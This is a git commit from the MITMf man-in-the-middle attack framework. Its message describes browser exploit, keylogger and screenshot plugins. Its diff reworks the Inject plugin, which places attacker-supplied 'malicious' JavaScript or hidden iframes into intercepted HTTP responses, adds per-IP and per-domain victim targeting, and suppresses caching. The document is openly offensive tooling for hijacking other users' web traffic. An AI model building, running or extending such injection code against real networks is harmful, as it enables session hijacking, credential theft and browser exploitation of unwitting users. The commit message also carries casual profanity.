This commit is just to push the changes so far to github , still have to tidy things up here and there and fix some bugs (also I really hate javascript)

JavaPwn plugin has been renamed to BrowserSniper (cause it now supports java, flash and browser exploits), it's been completly re-written along with it's config file section Addition of the screenshotter plugin, currently there is a bug when decoding the base64 encoded png files (a very wierd one) , but other than that it works (did i mention i hate js?) Jskeylogger's javscript now works on every browser except FF mobile (have no clue what's with that) p.s. did i mention i hate JS? Plugins that deal with javascript now read it from a file as supposed to having it built in (encoding issues) fu javascript User agent parsing is now built in and handled by core/httpagentparser.py, this because the user-agent library is a pain to install on some distros , also removes 3-4 deps which is a plus also fuck javascript
2025-07-06 13:02:24 -07:00 · 2015-05-16 00:43:56 +02:00 · 2015-05-16 00:43:56 +02:00 · ff39a302f9
commit ff39a302f9
parent 86870b8b72
32 changed files with 4378 additions and 681 deletions
--- a/plugins/Inject.py
+++ b/plugins/Inject.py
@ -27,46 +27,45 @@ import argparse
 from core.utils import SystemConfig
 from plugins.plugin import Plugin
 from plugins.CacheKill import CacheKill
-from core.sergioproxy.ProxyPlugins import ProxyPlugins

 mitmf_logger = logging.getLogger("mitmf")

-class Inject(Plugin):
+class Inject(CacheKill, Plugin):
    name       = "Inject"
    optname    = "inject"
    desc       = "Inject arbitrary content into HTML content"
-    version    = "0.2"
+    version    = "0.3"
    has_opts   = True

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
-        self.options      = options
-        self.our_ip       = SystemConfig.getIP(options.interface)
-        self.html_src     = options.html_url
-        self.js_src       = options.js_url
-        self.rate_limit   = options.rate_limit
-        self.count_limit  = options.count_limit
-        self.per_domain   = options.per_domain
-        self.black_ips    = options.black_ips
-        self.white_ips    = options.white_ips
-        self.match_str    = "</body>" or options.match_str
-        self.html_payload = options.html_payload
-        self.ctable       = {}
-        self.dtable       = {}
-        self.count        = 0
-        self.mime         = "text/html"
+        self.options       = options
+        self.our_ip        = SystemConfig.getIP(options.interface)
+        self.html_src      = options.html_url
+        self.js_src        = options.js_url
+        self.rate_limit    = options.rate_limit
+        self.count_limit   = options.count_limit
+        self.per_domain    = options.per_domain
+        self.black_ips     = options.black_ips.split(',')
+        self.white_ips     = options.white_ips.split(',')
+        self.white_domains = options.white_domains.split(',')
+        self.black_domains = options.black_domains.split(',')
+        self.match_str     = "</body>" or options.match_str
+        self.html_payload  = options.html_payload
+        self.ctable        = {}
+        self.dtable        = {}
+        self.count         = 0
+        self.mime          = "text/html"

        if not options.preserve_cache:
-            cachekill = CacheKill()
-            cachekill.initialize(options)
-            ProxyPlugins.getInstance().addPlugin(cachekill)
+            CacheKill.initialize(self, options)

    def serverResponse(self, response, request, data):
        #We throttle to only inject once every two seconds per client
        #If you have MSF on another host, you may need to check prior to injection
        #print "http://" + response.client.getRequestHostname() + response.uri
        ip, hn, mime = self._get_req_info(response)
-        if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.our_ip):
+        if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.our_ip):
            if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
                data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
                self.ctable[ip] = time.time()
@ -81,20 +80,37 @@ class Inject(Plugin):

    def _ip_filter(self, ip):

-        if self.white_ips is not None:
-            if ip in self.white_ips.split(','):
+        if self.white_ips[0] != '':
+            if ip in self.white_ips:
                return True
            else:
                return False

-        if self.black_ips is not None:
-            if ip in self.black_ips.split(','):
+        if self.black_ips[0] != '':
+            if ip in self.black_ips:
                return False
            else:
                return True

        return True

+    def _host_filter(self, host):
+
+        if self.white_domains[0] != '':
+            if host in self.white_domains:
+                return True
+            else:
+                return False
+
+        if self.black_domains[0] != '':
+            if host in self.black_domains:
+                return False
+            else:
+                return True
+
+        return True
+
+
    def _should_inject(self, ip, hn, mime):

        if self.count_limit == self.rate_limit is None and not self.per_domain:
@ -153,12 +169,14 @@ class Inject(Plugin):
    def pluginOptions(self, options):
        options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
        options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
-        options.add_argument("--html-payload", type=str, default=None, help="String you would like to inject.")
+        options.add_argument("--html-payload", type=str, default='', help="String you would like to inject.")
        options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. (</body> by default)")
        options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
        group = options.add_mutually_exclusive_group(required=False)
        group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
        group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
        group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
-        group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
-        group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
+        group.add_argument("--white-ips", metavar='IPS', type=str, default='', help="Inject content ONLY for these ips (comma seperated)")
+        group.add_argument("--black-ips", metavar='IPS', type=str, default='', help="DO NOT inject content for these ips (comma seperated)")
+        group.add_argument("--white-domains", metavar='DOMAINS', type=str, default='', help="Inject content ONLY for these domains (comma seperated)")
+        group.add_argument("--black-domains", metavar='DOMAINS', type=str, default='', help="DO NOT inject content for these domains (comma seperated)")